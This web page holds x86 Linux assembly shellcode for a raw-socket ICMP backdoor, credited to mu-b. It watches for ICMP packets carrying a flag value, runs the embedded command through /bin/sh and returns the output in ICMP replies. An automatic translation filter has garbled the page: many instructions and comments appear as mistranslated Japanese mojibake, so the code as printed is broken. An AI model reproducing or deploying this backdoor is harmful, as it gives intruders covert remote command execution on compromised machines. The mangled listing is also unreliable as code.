Linux/x86 - raw-socket ICMP/checksum Çú·â¤¹¤ë

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
Linux/x86 - raw-socket ICMP/checksum Çú·â¤¹¤ë - 235 bytes
;
; Copyright (c) 2007 by <mu-b@digit-labs.org>
;
; 235-byte raw-socket ICMP/checksum Çú·â¤¹¤ë - (x86-lnx)
; by mu-b - Nov 2006
;
; icmp with identifier __flag_byte and Ì¿Îá¡Ê¤¹¤ë¡Ës in the
; ¤Ë°ú¤Â³¤¤¤Æ È½·¿:-
;       "/ÃùÂ¢½ê/sh\x00-c\x00<Ì¿Îá¡Ê¤¹¤ë¡Ë here>\x00"
;
; unlike *other* icmp Çú·â¤¹¤ës, this will reply with
; 255-(sizeof icmp_hdr) bytes of À¸»º¡Ê¹â¡Ë..
;

%define zero_reg        esi
%define zero_reg_w      si
%define sock_reg        edi
%define __flag_byte     6996h

Á´À¤³¦¤Î _shell

_shell:
 xor   zero_reg, zero_reg
 mov   ebp, esp

 ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
_socket:
 lea   ebx, [zero_reg+3]
 ²¡¤·¿Ê¤á¤ë  byte 1
 ²¡¤·¿Ê¤á¤ë  ebx
 dec   ebx
 ²¡¤·¿Ê¤á¤ë  ebx
 dec   ebx
 mov   ecx, esp
 lea   eax, [zero_reg+66h]
 int   80h                 ; socket();
 mov   sock_reg, eax

 ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1);
_setsockopt:
 ²¡¤·¿Ê¤á¤ë  ebx
 ²¡¤·¿Ê¤á¤ë  esp
 ²¡¤·¿Ê¤á¤ë  byte 3h
 ²¡¤·¿Ê¤á¤ë  zero_reg
 ²¡¤·¿Ê¤á¤ë  sock_reg
 mov   ecx, esp
 mov   bl, byte 0eh
 mov   al, byte 66h
 int   80h                 ; setsocketopt();

 ; while(1)
_while_loop:
 ; read(sockfd, cmd, 255);
 cdq
 dec   byte dl
 mov   ecx, ebp
 mov   ebx, sock_reg
 lea   eax, [zero_reg+3]
 int   80h                 ; read();

 lea   ebx, [ebp+24]
 xor   [ebx], word __flag_byte
 jne   short _while_loop

 ; ËãÌô¤òµÛ¤¦(pp)
 lea   ebx, [ebp-8]
 mov   al, byte 2ah
 int   80h                 ; ËãÌô¤òµÛ¤¦();

 ; fork()
 mov   al, byte 2h
 int   80h                 ; fork();
 ¼Â¸³¡Ê¤¹¤ë¡Ë  eax, eax
 jnz   short _parent

_child:
 ; ¤Î¶á¤¯¤Ë(pp[0])
 mov   ebx, [ebp-8]
 mov   al, byte 6h
 int   80h                 ; ¤Î¶á¤¯¤Ë();

 ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2);
 lea   ecx, [zero_reg+3]
 ; pp[1] == pp[0]+1
 inc   ebx

.1:
 dec   ecx
 mov   al, byte 3fh
 int   80h                 ; dup2();
 jnz   .1

 ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0);
 ²¡¤·¿Ê¤á¤ë  zero_reg
 lea   ebx, [ebp+39]
 ²¡¤·¿Ê¤á¤ë  ebx
 sub   ebx, byte 3
 ²¡¤·¿Ê¤á¤ë  ebx
 sub   ebx, byte 8
 ²¡¤·¿Ê¤á¤ë  ebx
 mov   ecx, esp
 cdq
 mov   al, byte 0bh
 int   80h                 ; execve();

_parent:
 ; ¤Î¶á¤¯¤Ë(pp[1])
 mov   ebx, [ebp-4]
 lea   eax, [zero_reg+6]
 int   80h                 ; ¤Î¶á¤¯¤Ë();

_parent_read:
.1:
 ; read(pp[0], cmd, bytes_left);
 ; edx == 255
 lea   ecx, [ebp+28]
 mov   ebx, [ebp-8]
 mov   al, byte 3h
 int   80h                 ; read();
 ¼Â¸³¡Ê¤¹¤ë¡Ë  eax, eax
 jl    _while_loop

 mov   al, byte 6h
 int   80h                 ; ¤Î¶á¤¯¤Ë();

.2:
 ; Ä¾¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ë up ttl (optional?! make sure its high!)
 ; mov   [ebp+8], byte 0ffh

 ; switch ip's
 mov   ecx, [ebp+12]
 xchg  [ebp+16], ecx
 mov   [ebp+12], ecx

 ; »Ï¤á¤ë¡¤·è¤á¤ë icmp type to echo reply (optional?!)
 ;mov   [ebp+20], word zero_reg_w
 ; Ìµ checksum
 ;mov   [ebp+22], word zero_reg_w
 ; »Ï¤á¤ë¡¤·è¤á¤ë icmp type to echo and Ìµ checksum
 mov   [ebp+20], zero_reg

 lea   ecx, [zero_reg+117]
 lea   esi, [ebp+20]
 cdq

.3:
 lodsw
 ÄÉ²Ã¤¹¤ë   edx, eax
 ÃèÊÖ¤êÈô¹Ô  .3

 lodsb
 xor   ah, ah
 ÄÉ²Ã¤¹¤ë   eax, edx
 mov   esi, eax

 shr   eax, byte 16
 movzx esi, si
 ÄÉ²Ã¤¹¤ë   eax, esi
 mov   edx, eax
 shr   edx, byte 16
 ÄÉ²Ã¤¹¤ë   eax, edx
 not   ax

 ; »Ï¤á¤ë¡¤·è¤á¤ë checksum
 mov   [ebp+22], word ax

 cdq
 xor   eax, eax
 xor   zero_reg, zero_reg

 ; struct sockaddr *
 ²¡¤·¿Ê¤á¤ë  zero_reg
 ²¡¤·¿Ê¤á¤ë  zero_reg
 ²¡¤·¿Ê¤á¤ë  dword [ebp+16]
 ²¡¤·¿Ê¤á¤ë  byte 2

 ; sendto(sockfd, cmd, 255, 0, ...);
 mov   ecx, esp
 ²¡¤·¿Ê¤á¤ë  byte 16
 ²¡¤·¿Ê¤á¤ë  ecx
 ²¡¤·¿Ê¤á¤ë  zero_reg
 mov   dl, byte 0ffh
 ²¡¤·¿Ê¤á¤ë  edx
 ²¡¤·¿Ê¤á¤ë  ebp
 ²¡¤·¿Ê¤á¤ë  sock_reg
 mov   ecx, esp
 mov   bl, 0bh
 mov   al, 66h
 int   80h                 ; sendto();

 cdq
 mov   ecx, ebp
 mov   ebx, zero_reg
 mov   al, 72h
 int   80h                 ; wait();

 jmp   _while_loop